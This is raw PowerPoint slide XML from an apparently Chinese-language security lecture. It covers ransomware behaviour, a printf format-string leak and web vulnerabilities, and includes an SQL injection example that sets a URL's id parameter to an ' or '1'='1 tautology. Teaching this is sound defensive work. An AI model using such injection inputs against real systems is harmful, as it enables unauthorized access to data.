            <a:ext cx="7632700" cy="3786188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主要以邮件、程序木马、网上挂马等的形式进行传播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>勒索病毒文件一旦被用户点击打开，会利用连接至黑客的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C&amp;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器，进而上传本机信息并下载加密公钥和私钥。然后，将加密公钥私钥写入到注册表中，遍历本地所 有磁盘中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Office </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文档、图片等文件，对这些文件进行格式篡改和加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加密完成后，还会在桌面等明显位置生成勒索提示文件，指导用户去缴纳赎金。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMB Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>操作系统中的一个为计算机提供身份验证用以访问服务器上打印机和文件系统的组件）的注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>printf( )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句处设置断点进行调试，可以查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>printf( )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>处的汇编代码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93188" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="530225" y="3213100"/>
            <a:ext cx="8053388" cy="1743075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3398838" y="4600575"/>
            <a:ext cx="5184775" cy="1976438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="circleNumDbPlain"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>按从右至左将入口参数压栈：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="circleNumDbPlain"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的地址并压栈；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="circleNumDbPlain"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>将字符串“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>String: %s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>arg2: %#p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>arg3: %#p\n”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的地址压栈。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="circleNumDbPlain"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>时，把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>也压栈。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="circleNumDbPlain"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>接着调试进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>printf( )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" noProof="1">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2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pic>
        <p:nvPicPr>
          <p:cNvPr id="94212" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="862013"/>
            <a:ext cx="5611813" cy="5834062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3924300" y="3716338"/>
            <a:ext cx="5040313" cy="2001837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFCC"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>Printf( )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>的数目来依次显示堆栈中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>参数后面地址的内容，每次根据“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>格式”移动相应的字节数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>%p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>个字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>，因而打印结果为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFCC"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>String: Hello World!  , arg2: 00000000 , arg3: 00000000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94214" name="矩形 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6151563" y="836613"/>
            <a:ext cx="2381250" cy="1570037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击者通过打印出堆栈中的值来偷看程序的内存。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用程序漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="952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a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站脚本（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站请求伪造（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="962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注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入，这类漏洞通常发生在当不可信的数据作为命令或查询语句的一部分，被发送给处理程序或解释器的时候，攻击者意图通过上述过程使目标机执行计划外的命令或访问未经授权的数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="972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dirty="0"/>
              <a:t>在程序中，如果没有对用户输入数据的合法性进行判断的代码，那么用户在使用时就可以通过在输入中插入一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据。这种漏洞称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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en-US" dirty="0"/>
              <a:t>例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者浏览用户账户信息，发出请求：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>http://example.com/app/accountView?id=123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98308" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="630238" y="4005263"/>
            <a:ext cx="7842250" cy="258762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="椭圆 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5508625" y="3933825"/>
            <a:ext cx="2519363" cy="43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圆角矩形标注 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6300788" y="4908550"/>
            <a:ext cx="1727200" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26543"/>
              <a:gd name="adj2" fmla="val -1598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123</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4284663" y="3482975"/>
            <a:ext cx="4289425" cy="250825"/>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问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果攻击者在浏览器中将“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>”参数修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>’or’1’=‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，结果如何？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="4076700"/>
            <a:ext cx="5113337" cy="22860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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10035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从注入参数分类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
